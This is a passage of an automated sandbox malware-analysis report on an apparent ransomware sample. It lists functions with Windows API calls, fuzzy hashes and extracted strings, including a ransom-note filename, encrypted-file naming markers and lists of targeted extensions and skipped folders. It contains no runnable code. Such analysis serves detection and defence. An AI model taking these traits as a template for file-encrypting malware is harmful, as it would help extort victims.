                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,0095833C,?,?,?,?,?,008B1F07,?,?,?), ref: 009763C5
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 3c5cd231e2b1728d2506f47d371111ba29a64cca01671acd4cc8b82839e42739
                                      • Instruction ID: 2c7f5008d5ef336831e245158855be757f5044be2ebbc5c00fe8bb0fbc17daf0
                                      • Opcode Fuzzy Hash: 3c5cd231e2b1728d2506f47d371111ba29a64cca01671acd4cc8b82839e42739
                                      • Instruction Fuzzy Hash: CEE06D23609A30A7DA223A7A9C01B5A7A4CAF827A0F15C221FC1DA6191DFA5EC41D5E1
                                      Function 008C60A0 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                      Download Yara Rule
                                      APIs
                                      • EnumWindows.USER32(008C5A90,?), ref: 008C60C0
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: EnumWindows
                                      • String ID:
                                      • API String ID: 1129996299-0
                                      • Opcode ID: 400664d8a97a0cfb1d7d672d43fa6e49ba770c24c0a2fea6acdb2989a5f520cf
                                      • Instruction ID: 1025f225807a5fc91a54913a1d9dee568d3fb114decdbefc536b1c4f1b834f1c
                                      • Opcode Fuzzy Hash: 400664d8a97a0cfb1d7d672d43fa6e49ba770c24c0a2fea6acdb2989a5f520cf
                                      • Instruction Fuzzy Hash: 35E01234A1430CABCB00DFA5DD45B9EBBF8EB44300F5041A9D80697340DA706A489791
                                      Function 00980B5E Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,00000000,?,00980F39,?,?,00000000,?,00980F39,00000000,0000000C), ref: 00980B7B
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 7816b1dd96e3bad2896a10b720e3699d1e3781c10eb8295b6af161270aea587d
                                      • Instruction ID: b6e2ba59257b59a6c2e53af54c94b09947c89e9298ca26d2c5953a64f6c2264b
                                      • Opcode Fuzzy Hash: 7816b1dd96e3bad2896a10b720e3699d1e3781c10eb8295b6af161270aea587d
                                      • Instruction Fuzzy Hash: 0DD06C3211024DFFDF028F84DC06EDA3BAAFB48714F018000BA1856020C732E921AB90

                                      Non-executed Functions

                                      Function 0095C027 Relevance: 162.1, APIs: 78, Strings: 14, Instructions: 1097COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Name::operator+$NameName::Name::operator+=operator+
                                      • String ID: [thunk]:$`adjustor{$`local static destructor helper'$`template static data member constructor helper'$`template static data member destructor helper'$`vtordispex{$`vtordisp{$extern "C" $private: $protected: $public: $static $virtual $}'
                                      • API String ID: 3331067367-3028518216
                                      • Opcode ID: 1e200bcab36a490c480f97e2e15e37428820984b0a911e5b97f0a2540cf55514
                                      • Instruction ID: c7eda550a27dccf51212ae55024370e32963a3854190a2b807cf2e343c198fa3
                                      • Opcode Fuzzy Hash: 1e200bcab36a490c480f97e2e15e37428820984b0a911e5b97f0a2540cf55514
                                      • Instruction Fuzzy Hash: 048264B1D102099FDF19DFAAD891AEEB7B8BF44341F14452AFD16E7280EB349948CB50
                                      Function 008CB740 Relevance: 79.5, APIs: 7, Strings: 37, Instructions: 2469filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00008003,BA3649C5), ref: 008CB78D
                                      • FindFirstFileW.KERNEL32(?,?,009AFBF8,00000002), ref: 008CB7B5
                                      • lstrcmpW.KERNEL32(?,009AFF30), ref: 008CD0FE
                                      • lstrcmpW.KERNEL32(?,009AFF34), ref: 008CD114
                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 008CD3F1
                                      • FindNextFileW.KERNEL32(?,?), ref: 008CE043
                                      • FindClose.KERNEL32(?), ref: 008CE057
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Find$Filelstrcmp$CloseErrorFirstIos_base_dtorModeNextstd::ios_base::_
                                      • String ID: .1UI$.bat$.cmd$.cpl$.dll$.exe$.icl$.ico$.ini$.lnk$.log$.msi$.scr$2$Dflt$Dflt$\Application Data\Microsoft\Credentials$\Boot$\Documents and Settings\$\Documents and Settings\All Users\Start Menu$\Local Settings\Application Data\Microsoft\Credentials$\Local Settings\Temporary Internet Files$\ProgramData$\ProgramData\Microsoft$\Recovery$\Restore_Your_Files.txt$\Start Menu$\System Volume Information$\Users\All Users\Microsoft\Windows\Caches$\Users\Default\ntuser.dat$\WINDOWS$\Windows$\skips.txt$_Eg$_Enc$_Mail-$_[ID-
                                      • API String ID: 830838206-2490983636
                                      • Opcode ID: 2abc375b9a70303bd156033b0acf90420050022073450ce469dfa488f7a53dd2
                                      • Instruction ID: 81ebcbddce8460fa457ebe7761b2986520504808c0ab769241aefbf314c8684e
                                      • Opcode Fuzzy Hash: 2abc375b9a70303bd156033b0acf90420050022073450ce469dfa488f7a53dd2
                                      • Instruction Fuzzy Hash: AC333AB1E006288BDB24DF28CC95BDDB7B1FB45308F5081ADD509A7291DB74AAC5CF98
                                      Function 008CA2AA Relevance: 48.6, APIs: 7, Strings: 20, Instructions: 1318filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrcmpW.KERNEL32(?,009AFF30), ref: 008CA60B
                                      • lstrcmpW.KERNEL32(?,009AFF34), ref: 008CA621
                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 008CA8FE
                                      • FindNextFileW.KERNEL32(?,?), ref: 008CA956
                                      • FindClose.KERNEL32(?), ref: 008CA965
                                      • SetErrorMode.KERNEL32(00008003,BA3649C5), ref: 008CB78D
                                      • FindFirstFileW.KERNEL32(?,?,009AFBF8,00000002), ref: 008CB7B5
                                        • Part of subcall function 008B3740: __CxxThrowException@8.LIBVCRUNTIME ref: 008B376D
                                        • Part of subcall function 008B3740: __CxxThrowException@8.LIBVCRUNTIME ref: 008B37B2
                                        • Part of subcall function 008BAD70: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 008BAE4E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Find$Exception@8FileIos_base_dtorThrowlstrcmpstd::ios_base::_$CloseErrorFirstModeNext
                                      • String ID: .1UI$.bat$.cmd$.cpl$.dll$.exe$.icl$.ico$.ini$.lnk$.log$.msi$.scr$0$5$\Restore_Your_Files.txt$_Eg$_Enc$_Mail-$_[ID-
                                      • API String ID: 420669261-2349721455
                                      • Opcode ID: dd50a193c2a9e57535665852c78df96837a14dae3a16d0bca9fd2b03f0f00331
                                      • Instruction ID: 08a21efc47120e02f38bee93f628d2093bd78865e085a00ef6cf801b59d95676
                                      • Opcode Fuzzy Hash: dd50a193c2a9e57535665852c78df96837a14dae3a16d0bca9fd2b03f0f00331
                                      • Instruction Fuzzy Hash: 82C29A71D006188ADF24DB68CC86BEEB7B1FF55309F5082A9E509E7291DB30AE85CF41
                                      Function 008D45A0 Relevance: 34.7, APIs: 23, Instructions: 170memorythreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentThread.KERNEL32 ref: 008D45E3
                                      • OpenThreadToken.ADVAPI32(00000000), ref: 008D45EA
                                      • GetLastError.KERNEL32 ref: 008D45F4
                                      • GetCurrentProcess.KERNEL32(0000000A,?), ref: 008D460B
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 008D4612
                                      • DuplicateToken.ADVAPI32(?,00000002,?), ref: 008D4629
                                      • AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 008D4654
                                      • LocalAlloc.KERNEL32(00000040,00000014), ref: 008D4666
                                      • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 008D467A
                                      • GetLengthSid.ADVAPI32(?), ref: 008D468B
                                      • LocalAlloc.KERNEL32(00000040,00000010), ref: 008D4697
                                      • InitializeAcl.ADVAPI32(00000000,00000010,00000002), ref: 008D46AC
                                      • AddAccessAllowedAce.ADVAPI32(?,00000002,00000003,?), ref: 008D46C4
                                      • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 008D46DC
                                      • SetSecurityDescriptorGroup.ADVAPI32(00000000,?,00000000), ref: 008D46EE
                                      • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 008D46FC
                                      • IsValidSecurityDescriptor.ADVAPI32(00000000), ref: 008D4705
                                      • AccessCheck.ADVAPI32(00000000,?,00000001,00000001,?,00000014,?,00000000), ref: 008D4747
                                      • LocalFree.KERNEL32(?), ref: 008D476A
                                      • LocalFree.KERNEL32(00000000), ref: 008D4774
                                      • FreeSid.ADVAPI32(?), ref: 008D477E
                                      • CloseHandle.KERNEL32(?), ref: 008D4792
                                      • CloseHandle.KERNEL32(?), ref: 008D479C
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: DescriptorSecurity$Local$FreeInitializeToken$AccessAllocCloseCurrentHandleOpenProcessThread$AllocateAllowedCheckDaclDuplicateErrorGroupLastLengthOwnerValid
                                      • String ID:
                                      • API String ID: 1194227780-0
                                      • Opcode ID: a43fd61c8137cdd2a520a7bef19c5f2ee010fddb0c0f1d8ebbf615ae1c697d23
                                      • Instruction ID: df3cbebae1d4f43755f82da07d71cb5f62c4642da70b8f489975557d58020721
                                      • Opcode Fuzzy Hash: a43fd61c8137cdd2a520a7bef19c5f2ee010fddb0c0f1d8ebbf615ae1c697d23
                                      • Instruction Fuzzy Hash: 4F510971E14219ABEF109FA5DC49BAEBBB8FF09701F048126E611F6290DB74DA05DB60
                                      Function 008C8A30 Relevance: 30.4, APIs: 2, Strings: 15, Instructions: 684COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: \Application Data\Microsoft\Credentials$\Boot$\Documents and Settings\$\Documents and Settings\All Users\Start Menu$\Local Settings\Application Data\Microsoft\Credentials$\Local Settings\Temporary Internet Files$\ProgramData$\ProgramData\Microsoft$\Recovery$\Start Menu$\System Volume Information$\Users\All Users\Microsoft\Windows\Caches$\WINDOWS$\Windows$\skips.txt
                                      • API String ID: 0-3363970923
                                      • Opcode ID: f4b2573a663b82a37f2b8074a9e11304551636d20c73c6c5ab8eef3b32d77a03
                                      • Instruction ID: 7a75a9c1c1fa9251f66d767a1c1c54f46ccb2b63db30b527df80b860d4a7518b
                                      • Opcode Fuzzy Hash: f4b2573a663b82a37f2b8074a9e11304551636d20c73c6c5ab8eef3b32d77a03
                                      • Instruction Fuzzy Hash: 14623470E00618CFDF14CF68CC95B9EB7B1FB59305F1186A9D449A7290EB74AA88CF91
                                      Function 008C72E7 Relevance: 25.6, APIs: 1, Strings: 13, Instructions: 1091COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 008B3740: __CxxThrowException@8.LIBVCRUNTIME ref: 008B376D
                                        • Part of subcall function 008B3740: __CxxThrowException@8.LIBVCRUNTIME ref: 008B37B2
                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 008C895A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw$Ios_base_dtorstd::ios_base::_
                                      • String ID: &4r*3d$($.1UI$77H75$_Mail-$_[ID-$vj10au=$vj20au=$vj30au=$vj51au=$vj55au=$vjau=$wenf=
                                      • API String ID: 2823994529-359758777
                                      • Opcode ID: 68c37d1bcc2a7368c04239675b74158e475d5ca48333fe657fd232666aaf5e41
                                      • Instruction ID: ccfbb005ffcc51655674471c53e7e55f23a4b97c7a80e59a142416afad8493b0
                                      • Opcode Fuzzy Hash: 68c37d1bcc2a7368c04239675b74158e475d5ca48333fe657fd232666aaf5e41
                                      • Instruction Fuzzy Hash: A9A2BD31A14258CBDB24CF68CC55BDDBBB2FF85318F10429DE449AB2A1DB35AA84CF51
                                      Function 008C06F8 Relevance: 18.6, Strings: 14, Instructions: 1051COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: '$.1UI$77H75$_Mail-$_[ID-$boot.ini$bootmgr$bootsect.bak$desktop.ini$nqpso5938fh71jfu$r_cfg.ini$restore_your_files.txt$sysmain.sys$xinfecter.exe
                                      • API String ID: 0-2108258418
                                      • Opcode ID: 169e404db6fa7e74ad84b15c5a1e8e432a6631ee6a3de8344e864dc2fbcf906b
                                      • Instruction ID: eab962e9bbc25d122bb0f6a0d4d708d52447795966a8664955c0c73c892a03b4
                                      • Opcode Fuzzy Hash: 169e404db6fa7e74ad84b15c5a1e8e432a6631ee6a3de8344e864dc2fbcf906b
                                      • Instruction Fuzzy Hash: 15B237309106688ADB29DB28CC95BEEB7B5FF95304F1442E9D00DA7292EB749B85CF41
                                      Function 008C6280 Relevance: 16.0, APIs: 4, Strings: 5, Instructions: 250libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(kernel32,GetLogicalProcessorInformation,?), ref: 008C62BA
                                      • GetProcAddress.KERNEL32(00000000), ref: 008C62C1
                                      • GetLastError.KERNEL32 ref: 008C62FF
                                      Strings
                                      • GetLogicalProcessorInformation, xrefs: 008C629C
                                      • Error: Allocation failure, xrefs: 008C632D
                                      • kernel32, xrefs: 008C62A1
                                      • GetLogicalProcessorInformation is not supported., xrefs: 008C62CF
                                      • Error %d, xrefs: 008C634E
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: AddressErrorHandleLastModuleProc
                                      • String ID: Error %d$Error: Allocation failure$GetLogicalProcessorInformation is not supported.$GetLogicalProcessorInformation$kernel32
                                      • API String ID: 4275029093-3269863577
                                      • Opcode ID: 25cdb2f9c65835cdd2ab7d2c4bc25b6cc5905efa8c136cca84940b62ea373595
                                      • Instruction ID: 7854c514726399678817329f756ceec669537615aa83e0c9465eef5d6ff2843a
                                      • Opcode Fuzzy Hash: 25cdb2f9c65835cdd2ab7d2c4bc25b6cc5905efa8c136cca84940b62ea373595
                                      • Instruction Fuzzy Hash: 0471EF31A147458BD7189B28DC42B6EB3E1FFC4324F444A2DF886C7291EB74E9958B82
                                      Function 00924060 Relevance: 15.3, Strings: 12, Instructions: 257COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Auth$Cent$Genu$Hygo$auls$aurH$cAMD$enti$ineI$nGen$ntel$uine
                                      • API String ID: 0-2607262942
                                      • Opcode ID: ebc0ea91698a2db08f6b699a7a703975c1db3e43518fe3945f6d526348411c88
                                      • Instruction ID: 52e15d4eea86310ded9d49f76eb1acbe6eaebb889d3651b3695869b8c6273ba7
                                      • Opcode Fuzzy Hash: ebc0ea91698a2db08f6b699a7a703975c1db3e43518fe3945f6d526348411c88
                                      • Instruction Fuzzy Hash: F391397151D3A18FD729CF28E8413ABBBD4AB75300F04892EE8DA97397C625D984DB42
                                      Function 00944AE4 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00946173: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00946186
                                      • Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 00944AF6
                                        • Part of subcall function 00946286: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 009462B0
                                        • Part of subcall function 00946286: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 0094631F
                                      • Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 00944C28
                                      • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 00944C88
                                      • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 00944C94
                                      • Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 00944CCF
                                      • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 00944CF0
                                      • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 00944CFC
                                      • Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 00944D05
                                      • Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 00944D1D
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
                                      • String ID:
                                      • API String ID: 2508902052-0
                                      • Opcode ID: 6205ff1eeeaee0cf79450def734d6f74160819ef6e24cea2f90ec9e8164c7a4b
                                      • Instruction ID: 2e854fb7a3bd859dba151096f8409bcca456b18a6c3b2b225ea7fe3546052451
                                      • Opcode Fuzzy Hash: 6205ff1eeeaee0cf79450def734d6f74160819ef6e24cea2f90ec9e8164c7a4b
                                      • Instruction Fuzzy Hash: C68139B1E006269FCB19DFA8C5C0B6DB7B6FF88305B2586A9D845A7701C770ED52CB90
                                      Function 008CF020 Relevance: 13.1, APIs: 5, Strings: 2, Instructions: 812networkCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 008B5130: CreateSemaphoreA.KERNEL32(00000000,00000000,7FFFFFFF,00000000), ref: 008B5198
                                        • Part of subcall function 008B5130: CreateSemaphoreA.KERNEL32(00000000,00000000,7FFFFFFF,00000000), ref: 008B51AC
                                        • Part of subcall function 008B5130: CreateSemaphoreA.KERNEL32(00000000,00000000,7FFFFFFF,00000000), ref: 008B51C0
                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 008CF6C4
                                      • PathIsNetworkPathA.SHLWAPI(00000000,?,00000002,-00000015,BA3649C5), ref: 008CF76F
